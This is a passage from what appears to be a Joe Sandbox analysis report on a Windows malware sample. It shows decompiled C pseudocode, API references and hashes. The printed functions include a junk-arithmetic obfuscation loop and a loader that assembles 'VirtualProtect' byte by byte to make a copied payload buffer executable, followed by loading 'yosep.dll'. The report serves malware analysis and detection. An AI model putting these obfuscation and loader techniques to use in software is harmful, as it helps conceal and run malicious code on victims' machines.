						_v340 = _v340 + 0x14bc8a19;
						_v244 = _v244 + 0x64a01771;
						_v40 = _v40 - 0x74023300;
						_v156 = _v156 - 0x3b643513;
						_v100 = _v100 - 0x53ffed8f;
						_v144 = _v144 - 0x2e682f84;
						_v180 = _v180 + 0x475aac54;
						_v220 = _v220 - 0x47dc6a5b;
						_v220 = _v220 - 0x1c18d963;
						_v340 = _v340 - 0x394aef10;
						_v272 = _v272 + 0x4afb8733;
						_v284 = _v284 + 0x1158e7b7;
						_v184 = _v184 + 0x2a332265;
						_v264 = _v264 + 0x1e01fc46;
						_v176 = _v176 + 0x59cb4930;
						_v320 = _v320 - 0x3746ef35;
						_v304 = _v304 - 0x33901629;
						_v148 = _v148 + 0x200960fa;
						_v268 = _v268 + 0x270d63c2;
						_v328 = _v328 - 0x538ef25c;
						_v56 = _v56 - 0x1442058;
						_v176 = _v176 + 0x202d0e4e;
						_v48 = _v48 - 0x128ada4f;
						_v72 = _v72 - 0x1bbf669e;
						_v184 = _v184 - 0x16d9feb0;
						_v152 = _v152 - 0x551d7c0;
						_v284 = _v284 + 0x7f0531ec;
						_v152 = _v152 - 0x53344960;
						_v40 = _v40 + 0x17ab5b83;
						_v40 = _v40 - 0x4cb3ea82;
					}
					if(_t1228 > 0x23f110) {
						break;
					}
					_t1228 = _t1228 + 1;
					if(_t1228 < 0x152fade0) {
						continue;
					}
					break;
				}
				 *0x42e384 =  *0x417cdc;
				 *0x42e388 =  *0x416d3c;
				E0040297F(_t1148);
				return 0;
			}

0x00402adc
0x00402adc
0x00402aed
0x00402af0
0x00402af7
0x00402afe
0x00402b05
0x00402b0d
0x00402b15
0x00402b1d
0x00402b24
0x00402b2a
0x00402b2b
0x00402b2f
0x00402b32
0x00402b37
0x00402b37
0x00402b39
0x00402b3b
0x00402b3d
0x00402b44
0x00402b4e
0x00402b5a
0x00402b60
0x00402b6b
0x00402b76
0x00402b7e
0x00402b89
0x00402b91
0x00402b99
0x00402ba4
0x00402baf
0x00402bba
0x00402bc2
0x00402bcd
0x00402bd5
0x00402be0
0x00402beb
0x00402bf3
0x00402bfe
0x00402c09
0x00402c14
0x00402c1f
0x00402c27
0x00402c2f
0x00402c3a
0x00402c42
0x00402c4a
0x00402c55
0x00402c60
0x00402c68
0x00402c73
0x00402c7e
0x00402c89
0x00402c91
0x00402c9c
0x00402ca7
0x00402caf
0x00402cb7
0x00402cc2
0x00402cca
0x00402cd2
0x00402cdd
0x00402ce8
0x00402cf3
0x00402cfe
0x00402d06
0x00402d0e
0x00402d19
0x00402d24
0x00402d2f
0x00402d3a
0x00402d45
0x00402d50
0x00402d58
0x00402d63
0x00402d6e
0x00402d76
0x00402d81
0x00402d8c
0x00402d97
0x00402da2
0x00402dad
0x00402db5
0x00402dc0
0x00402dcb
0x00402dd6
0x00402de1
0x00402de9
0x00402df4
0x00402dfc
0x00402e07
0x00402e12
0x00402e1d
0x00402e28
0x00402e30
0x00402e3b
0x00402e43
0x00402e4b
0x00402e53
0x00402e5e
0x00402e69
0x00402e71
0x00402e7c
0x00402e87
0x00402e8f
0x00402e97
0x00402ea2
0x00402ead
0x00402ecb
0x00402ed6
0x00402ee1
0x00402eec
0x00402ef7
0x00402f02
0x00402f0d
0x00402f45
0x00402f50
0x00402f85
0x00402fa0
0x00402fd1
0x00402fd9
0x00402ff4
0x00402fff
0x00403014
0x0040301f
0x0040302a
0x00403035
0x00403040
0x00403048
0x00403053
0x0040306b
0x00403073
0x0040307e
0x00403086
0x0040309b
0x004030a3
0x004030ae
0x004030b9
0x004030c1
0x004030c9
0x004030d4
0x004030f2
0x004030fd
0x00403118
0x00403123
0x00403138
0x00403160
0x0040316b
0x00403176
0x0040319b
0x004031a6
0x004031ae
0x004031b9
0x004031db
0x004031e3
0x004031ee
0x004031f9
0x00403201
0x00403219
0x00403221
0x00403229
0x0040323e
0x00403282
0x0040329d
0x004032b8
0x004032c3
0x004032cb
0x004032d6
0x004032de
0x00403306
0x0040330e
0x00403316
0x00403321
0x0040332c
0x00403337
0x00403372
0x00403390
0x0040339b
0x004033a6
0x004033c4
0x004033cf
0x004033da
0x004033e2
0x00403400
0x0040340b
0x00403416
0x0040341e
0x00403429
0x00403434
0x0040344f
0x00403467
0x0040346f
0x0040348a
0x00403495
0x004034a0
0x004034a8
0x004034c0
0x00403511
0x0040354f
0x0040357a
0x004035a5
0x004035b0
0x004035bb
0x004035c3
0x004035ce
0x004035d9
0x004035e4
0x00403615
0x0040361d
0x00403628
0x00403630
0x0040363b
0x0040366d
0x00403678
0x00403680
0x0040368b
0x00403693
0x0040369b
0x004036b9
0x004036c4
0x004036cf
0x004036ed
0x004036f8
0x00403716
0x00403721
0x00403729
0x00403744
0x0040374c
0x0040376a
0x0040377f
0x0040378a
0x00403792
0x0040379a
0x004037a5
0x004037ad
0x004037d5
0x0040380d
0x00403818
0x00403823
0x0040382e
0x00403839
0x00403877
0x004038c5
0x004038dd
0x004038e8
0x004038e8
0x004038f9
0x00000000
0x00000000
0x004038fb
0x00403902
0x00000000
0x00000000
0x00000000
0x00403902
0x0040390d
0x00403917
0x0040391c
0x0040392b

APIs

WindowFromDC.USER32(00000000), ref: 00402AF0
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00402AF7
GetNumberOfConsoleMouseButtons.KERNEL32(00000000), ref: 00402AFE
ResetEvent.KERNEL32(00000000), ref: 00402B05
EndUpdateResourceW.KERNEL32(00000000,00000000), ref: 00402B0D
GetComputerNameW.KERNEL32 ref: 00402B15
_calloc.LIBCMT ref: 00402B1D

Part of subcall function 00403954: __calloc_impl.LIBCMT ref: 00403969

_calloc.LIBCMT ref: 00402B24
SetCommMask.KERNELBASE(00000000,00000000), ref: 00402B3D
SetLastError.KERNEL32(00000000), ref: 00402B44
GetConsoleAliasW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00402B4E

Strings

g#o*, xrefs: 00402B91
jip5, xrefs: 00402DA2
C[Ie, xrefs: 00403229
T+Zx, xrefs: 0040330E
<4X, xrefs: 00403352
<=Tl, xrefs: 00403504
R\4T, xrefs: 00403400
eXYh, xrefs: 00402F25
`Y7@, xrefs: 00402F32
eW9$, xrefs: 00403249
ua%, xrefs: 0040337D
@`Fm, xrefs: 00403118
4PJN, xrefs: 00402EEC
5F7, xrefs: 0040378A
#h-, xrefs: 00402F72
%$6, xrefs: 00403306
B;, xrefs: 00402FBE
`I4S, xrefs: 004038C5
ciH, xrefs: 00403477
Ej^, xrefs: 00402C42
cb6E, xrefs: 00403628
"d=, xrefs: 004034A0
K5, xrefs: 004035D9
IBu7, xrefs: 0040356D
p1Mm, xrefs: 00402E71
e"3*, xrefs: 0040374C

Memory Dump Source

Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd

Similarity

API ID: Console_calloc$AliasButtonsCommComputerEnvironmentErrorEventFreeFromLastMaskMouseNameNumberResetResourceStringsUpdateWindow__calloc_impl
String ID: "d=$#h-$%$6$4PJN$5F7$<=Tl$<4X$@`Fm$B;$C[Ie$Ej^$IBu7$K5$R\4T$T+Zx$`I4S$`Y7@$cb6E$ciH$e"3*$eW9$$eXYh$g#o*$jip5$p1Mm$ua%
API String ID: 3970707773-1174297621
Opcode ID: 89226f564d5f7ef76224a0bb22336775805795087b84c8bbd26aea03c150fafb
Instruction ID: 7d6024ee7fd9ec234fd95a22c0028d596abd6143ad8083b8d8f630a2275a3152
Opcode Fuzzy Hash: 89226f564d5f7ef76224a0bb22336775805795087b84c8bbd26aea03c150fafb
Instruction Fuzzy Hash: 1462EAB9609380CBC2B48F6AC58968EF7E4BF99354F508D0CE5CA9A620C7709985CF57

Uniqueness

Uniqueness Score: -1.00%

Function 0040714F Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040714F() {
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t1;
				void* _t5;
				void* _t18;
				WCHAR* _t20;

				_t1 = GetEnvironmentStringsW();
				_t20 = _t1;
				if(_t20 != 0) {
					if( *_t20 != 0) {
						goto L3;
						do {
							do {
								L3:
								_t1 =  &(_t1[1]);
							} while ( *_t1 != 0);
							_t1 =  &(_t1[1]);
						} while ( *_t1 != 0);
					}
					_t13 = _t1 - _t20 + 2;
					_t5 = E004080C9(_t1 - _t20 + 2); // executed
					_t18 = _t5;
					if(_t18 != 0) {
						E0040A030(_t13, _t18, _t20, _t18, _t20, _t13);
					}
					FreeEnvironmentStringsW(_t20);
					return _t18;
				} else {
					return 0;
				}
			}

0x00407152
0x00407158
0x0040715e
0x00407167
0x00000000
0x00407169
0x00407169
0x00407169
0x0040716a
0x0040716b
0x00407171
0x00407172
0x00407169
0x0040717c
0x00407180
0x00407185
0x0040718a
0x0040719c
0x004071a1
0x0040718d
0x00407198
0x00407160
0x00407163
0x00407163

APIs

GetEnvironmentStringsW.KERNEL32(00000000,00403F3A), ref: 00407152
__malloc_crt.LIBCMT ref: 00407180
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040718D

Memory Dump Source

Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 8fabccca1e6171ddc240eda1d034c06755ba580f82cf259f9fe05248f73ea12e
Instruction ID: 3864f1fbe5c903a96f437bc9bd3a71b249565b48777c964063066275c13dfad6
Opcode Fuzzy Hash: 8fabccca1e6171ddc240eda1d034c06755ba580f82cf259f9fe05248f73ea12e
Instruction Fuzzy Hash: 97F0E23B9191616ADA203B357C488771668DAC6329312443BF896E73C0F9385D8382AA

Uniqueness

Uniqueness Score: -1.00%

Function 00407400 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00407400(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x42cc54 = _t6;
				if(_t6 != 0) {
					 *0x42e3b0 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x00407415
0x0040741b
0x00407422
0x00407429
0x0040742f
0x00407425
0x00407425
0x00407425

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00407415

Memory Dump Source

Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: a8e052f728ec12cc3e5f5d60750cda5194ed186666e8db9e306b9fa3345bd77c
Instruction ID: a3bc6628b949999fdfff56c04f18f5397488db4a514c08553ac6af2647db9f8c
Opcode Fuzzy Hash: a8e052f728ec12cc3e5f5d60750cda5194ed186666e8db9e306b9fa3345bd77c
Instruction Fuzzy Hash: 64D0A732A543849EDB209FB2BD08B663BDCE3843D5F408437FA0DD6690F674D951C548

Uniqueness

Uniqueness Score: -1.00%

Function 0040619B Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040619B() {
				void* _t1;

				_t1 = E00406129(0); // executed
				return _t1;
			}

0x0040619d
0x004061a3

APIs

__encode_pointer.LIBCMT ref: 0040619D

Part of subcall function 00406129: TlsGetValue.KERNEL32(00000000,?,004061A2,00000000,0040A3A5,0042C5B0,00000000,00000314), ref: 0040613B
Part of subcall function 00406129: TlsGetValue.KERNEL32(00000004,?,004061A2,00000000,0040A3A5,0042C5B0,00000000,00000314), ref: 00406152
Part of subcall function 00406129: RtlEncodePointer.NTDLL(?,?,004061A2,00000000,0040A3A5,0042C5B0,00000000,00000314), ref: 00406190

Memory Dump Source

Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: e87044ab682afd9b7b1670cd61dbbbfcd87b06b4ecde40ab423a09c9dfcd5251
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040297F Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 110
librarythreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E0040297F(void* __ecx) {
				void* _v6;
				long _v8;
				short _v2056;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t25;
				void* _t33;
				void* _t35;
				intOrPtr _t36;
				void* _t37;
				void* _t40;
				void* _t42;

				_t35 = __ecx;
				if( *0x42e384 == 0x412) {
					E00403B0A(0);
					E00403AE9(0, 0);
					E00403DC0(0);
				}
				 *0x42e384 =  *0x42e384 + 0xb2d3b;
				_t10 = GetModuleHandleA("kernel32.dll");
				 *0x42e1d8 = _t10;
				_t11 = GetProcAddress(_t10, "LocalAlloc");
				 *0x42e14c = _t11;
				 *0x42e148 =  *_t11(0,  *0x42e384);
				E004028BE(_t35);
				_t36 =  *0x42e384;
				_t14 = 0;
				if(_t36 > 0) {
					do {
						 *((char*)( *0x42e148 + _t14)) =  *((intOrPtr*)( *0x42e388 + _t14 + 0xb2d3b));
						_t14 = _t14 + 1;
					} while (_t14 < _t36);
				}
				_t40 = 0;
				do {
					if(_t36 + _t40 == 0x5e) {
						GetCurrentThreadId();
						VirtualAlloc(0, 0, 0, 0);
						ReadConsoleA(0, 0, 0, 0, 0);
						_t36 =  *0x42e384;
					}
					_t40 = _t40 + 1;
				} while (_t40 < 0x40c893);
				E00402834();
				_t37 = 0;
				do {
					if(_t37 == 0x770e) {
						E004028A4(_t37);
					}
					_t37 = _t37 + 1;
				} while (_t37 < 0x286b97d);
				_t33 = 0x7b;
				do {
					if( *0x42e384 == 0xf) {
						_v8 = 0;
						asm("stosw");
						_push( &_v8);
						_push(0);
						_push(0);
						L0040392E();
						LockResource(0);
					}
					_t33 = _t33 - 1;
				} while (_t33 != 0);
				_t42 = 0x184cc;
				do {
					if( *0x42e384 == 0x1833b) {
						GetComputerNameW( &_v2056,  &_v8);
						__imp__SetThreadExecutionState(0);
						TlsSetValue(0, 0);
					}
					_t42 = _t42 - 1;
				} while (_t42 != 0);
				_t25 = LoadLibraryW(L"yosep.dll");
				E00402973();
				return _t25;
			}

0x0040297f
0x00402994
0x00402999
0x004029a0
0x004029a9
0x004029a9
0x004029ae
0x004029bd
0x004029c9
0x004029ce
0x004029dd
0x004029e4
0x004029e9
0x004029ee
0x004029f4
0x004029f8
0x004029fa
0x00402a0d
0x00402a10
0x00402a11
0x004029fa
0x00402a15
0x00402a17
0x00402a1d
0x00402a1f
0x00402a29
0x00402a34
0x00402a3a
0x00402a3a
0x00402a40
0x00402a41
0x00402a49
0x00402a4e
0x00402a50
0x00402a56
0x00402a58
0x00402a58
0x00402a5d
0x00402a5e
0x00402a69
0x00402a6a
0x00402a71
0x00402a75
0x00402a7c
0x00402a81
0x00402a82
0x00402a83
0x00402a84
0x00402a8a
0x00402a8a
0x00402a90
0x00402a90
0x00402a93
0x00402a99
0x00402aa3
0x00402ab0
0x00402ab7
0x00402abf
0x00402abf
0x00402ac5
0x00402ac5
0x00402acd
0x00402ad3
0x00402adb

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004029BD
GetProcAddress.KERNEL32(00000000,LocalAlloc), ref: 004029CE
GetCurrentThreadId.KERNEL32 ref: 00402A1F
VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000), ref: 00402A29
ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00402A34
SetConsoleDisplayMode.KERNEL32(00000000,00000000,?), ref: 00402A84
LockResource.KERNEL32(00000000,00000000,00000000,?), ref: 00402A8A
GetComputerNameW.KERNEL32 ref: 00402AB0
SetThreadExecutionState.KERNEL32 ref: 00402AB7
TlsSetValue.KERNEL32(00000000,00000000), ref: 00402ABF
LoadLibraryW.KERNEL32(yosep.dll), ref: 00402ACD

Part of subcall function 00403B0A: __wcstoi64.LIBCMT ref: 00403B16

Part of subcall function 00403DC0: _doexit.LIBCMT ref: 00403DCC

Strings

kernel32.dll, xrefs: 004029B8
LocalAlloc, xrefs: 004029C3
yosep.dll, xrefs: 00402AC8

Memory Dump Source

Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd

Similarity

API ID: ConsoleThread$AddressAllocComputerCurrentDisplayExecutionHandleLibraryLoadLockModeModuleNameProcReadResourceStateValueVirtual__wcstoi64_doexit
String ID: LocalAlloc$kernel32.dll$yosep.dll
API String ID: 1649761710-3699620503
Opcode ID: 3abfe71ded4f46f35cbbda1fc2cde1482eb0394db2f97f634bb155367cdcef5a
Instruction ID: 9b9f6138e887a4192517514cc06cfdbd3fc59b7e25ec7b7a1235e6f02078c316
Opcode Fuzzy Hash: 3abfe71ded4f46f35cbbda1fc2cde1482eb0394db2f97f634bb155367cdcef5a
Instruction Fuzzy Hash: E431E775A01120ABC731EB62AF4D99F3B68EF45315750003AF545F21E1DBBC4686CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405EC0 Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00405EC0(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x4116f8; // 0x6abd1eb3
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x42cdc8 = _t6;
				 *0x42cdc4 = _t22;
				 *0x42cdc0 = _t25;
				 *0x42cdbc = _t21;
				 *0x42cdb8 = _t27;
				 *0x42cdb4 = _t26;
				 *0x42cde0 = ss;
				 *0x42cdd4 = cs;
				 *0x42cdb0 = ds;
				 *0x42cdac = es;
				 *0x42cda8 = fs;
				 *0x42cda4 = gs;
				asm("pushfd");
				_pop( *0x42cdd8);
				 *0x42cdcc =  *_t31;
				 *0x42cdd0 = _v0;
				 *0x42cddc =  &_a4;
				 *0x42cd18 = 0x10001;
				_t11 =  *0x42cdd0; // 0x0
				 *0x42cccc = _t11;
				 *0x42ccc0 = 0xc0000409;
				 *0x42ccc4 = 1;
				_t12 =  *0x4116f8; // 0x6abd1eb3
				_v812 = _t12;
				_t13 =  *0x4116fc; // 0x9542e14c
				_v808 = _t13;
				 *0x42cd10 = IsDebuggerPresent();
				_push(1);
				E004091B5(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x401a98);
				if( *0x42cd10 == 0) {
					_push(1);
					E004091B5(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00405ec0
0x00405ec0
0x00405ec0
0x00405ec0
0x00405ec0
0x00405ec0
0x00405ec0
0x00405ec6
0x00405ec8
0x00405ec8
0x0040a6e5
0x0040a6ea
0x0040a6f0
0x0040a6f6
0x0040a6fc
0x0040a702
0x0040a708
0x0040a70f
0x0040a716
0x0040a71d
0x0040a724
0x0040a72b
0x0040a732
0x0040a733
0x0040a73c
0x0040a744
0x0040a74c
0x0040a757
0x0040a761
0x0040a766
0x0040a76b
0x0040a775
0x0040a77f
0x0040a784
0x0040a78a
0x0040a78f
0x0040a79b
0x0040a7a0
0x0040a7a2
0x0040a7aa
0x0040a7b5
0x0040a7c2
0x0040a7c4
0x0040a7c6
0x0040a7cb
0x0040a7df

APIs

IsDebuggerPresent.KERNEL32 ref: 0040A795
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A7AA
UnhandledExceptionFilter.KERNEL32(00401A98), ref: 0040A7B5
GetCurrentProcess.KERNEL32(C0000409), ref: 0040A7D1
TerminateProcess.KERNEL32(00000000), ref: 0040A7D8

Memory Dump Source

Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 3d7d3eec9a3fd2426ea4d5cbdc0aab05956cf272709b05de423caaa91d30f816
Instruction ID: 2974f63649a1c9ba2073cb140afa8dc02fec11298bb61fbb0d4b08a460ec1183
Opcode Fuzzy Hash: 3d7d3eec9a3fd2426ea4d5cbdc0aab05956cf272709b05de423caaa91d30f816
Instruction Fuzzy Hash: 8A21C3B5A602059FD760DF25ED846583FB4FF88314F90443AE90897370D7B56A828F8D

Uniqueness

Uniqueness Score: -1.00%

Function 004028BE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004028BE(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HINSTANCE__* _t6;

				_t6 = LoadLibraryA("kernel32.dll");
				 *0x42e1d8 = _t6;
				 *0x42d0b0 = 0x56;
				 *0x42d0b1 = 0x69;
				 *0x42d0b2 = 0x72;
				 *0x42d0b7 = 0x50;
				 *0x42d0bd = 0x74;
				 *0x42d0be = 0;
				 *0x42d0b3 = 0x74;
				 *0x42d0b4 = 0x75;
				 *0x42d0b5 = 0x61;
				 *0x42d0b6 = 0x6c;
				 *0x42d0b8 = 0x72;
				 *0x42d0b9 = 0x6f;
				 *0x42d0ba = 0x74;
				 *0x42d0bb = 0x65;
				 *0x42d0bc = 0x63;
				 *0x42e140 = GetProcAddress(_t6, 0x42d0b0);
				_v8 = 0x20;
				_v8 = _v8 + 0x20;
				return  *0x42e140( *0x42e148,  *0x42e384, _v8,  &_v12, __ecx, __ecx);
			}

0x004028c8
0x004028d4
0x004028d9
0x004028e0
0x004028e7
0x004028ee
0x004028f5
0x004028fc
0x00402903
0x0040290a
0x00402911
0x00402918
0x0040291f
0x00402926
0x0040292d
0x00402934
0x0040293b
0x00402948
0x0040294d
0x00402954
0x00402972

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 004028C8
GetProcAddress.KERNEL32(00000000,0042D0B0), ref: 00402942

Strings

kernel32.dll, xrefs: 004028C3
, xrefs: 00402954

Memory Dump Source

Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: $kernel32.dll
API String ID: 2574300362-2116778257
Opcode ID: eb7cc3dcad7fd642cee9cdcc13478540364151637f3bedb6abaea89dc8d7e197
Instruction ID: 1eaf5cb0e818d45cad65fc96adac9ec62e658d76ba46d43f61fac26e64c648ff
Opcode Fuzzy Hash: eb7cc3dcad7fd642cee9cdcc13478540364151637f3bedb6abaea89dc8d7e197
Instruction Fuzzy Hash: 2111A870E0C2C0DEE722CB69FD087557EA66B2674DF9800B8D184562B2C3BA155B873F

Uniqueness

Uniqueness Score: -1.00%

Function 00406E1E Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406E1E() {

				SetUnhandledExceptionFilter(E00406DDC);
				return 0;
			}

0x00406e23
0x00406e2b

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00006DDC), ref: 00406E23

Memory Dump Source

Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 13f742693bcbd04f8ee0903116d6ac8c950154b9ce705657eac7bc5df116bc29
Instruction ID: 1363d427eb1f8dc8124538c81e308e39bbfcc94e00fbedef604c64db2dde4652
Opcode Fuzzy Hash: 13f742693bcbd04f8ee0903116d6ac8c950154b9ce705657eac7bc5df116bc29
Instruction Fuzzy Hash: 509002607711505AC6002B706D0DA0535A46E49746B520571B042F44A8DA7540519919

Uniqueness

Uniqueness Score: -1.00%

Function 00406290 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00406290(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
